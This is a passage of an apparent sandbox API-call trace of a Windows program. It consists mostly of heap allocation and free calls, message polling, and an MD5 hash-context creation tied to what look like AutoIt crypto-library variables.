Size=0x10) returned 0x2e50920 [0189.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0189.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0189.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0189.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0189.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0189.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0189.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0189.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0189.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0189.872] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0189.872] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0189.872] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.872] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0189.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0189.872] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.873] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0189.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0189.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0189.873] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.873] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0189.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0189.873] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.873] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0189.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0189.873] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0189.873] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0189.873] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0189.873] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0189.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0189.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0189.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0189.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0189.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.873] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.873] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0189.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0189.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0189.874] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.874] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0189.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0189.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0189.874] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0189.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0189.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0189.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0189.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0189.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0189.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50ad0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0189.874] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0189.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0189.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0189.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0189.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0189.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0189.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0189.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0189.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0189.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0189.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0189.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0189.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0189.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0189.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0189.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0189.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0189.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0189.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0189.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0189.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0189.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0189.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0189.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0189.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0189.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0189.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0189.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0189.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0189.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0189.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0189.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0189.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0189.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0189.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0189.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0189.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0189.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0189.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0189.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0189.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0189.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0189.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0189.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0189.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0189.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0189.877] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0189.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0189.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0189.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0189.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0189.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0189.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0189.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0189.878] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0189.878] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0189.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0189.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0189.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0189.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0189.878] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0189.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0189.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0189.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0189.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0189.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0189.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0189.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0189.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0189.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0189.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0189.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0189.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d28 [0189.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0189.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0189.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0189.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0189.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ef8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0189.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0189.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0189.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0189.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0189.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0189.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0189.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0189.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0189.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0189.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0189.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0189.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0189.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0189.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0189.880] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0189.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0189.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0189.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0189.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0189.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0189.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0189.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0189.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0189.881] RtlAllocateHeap 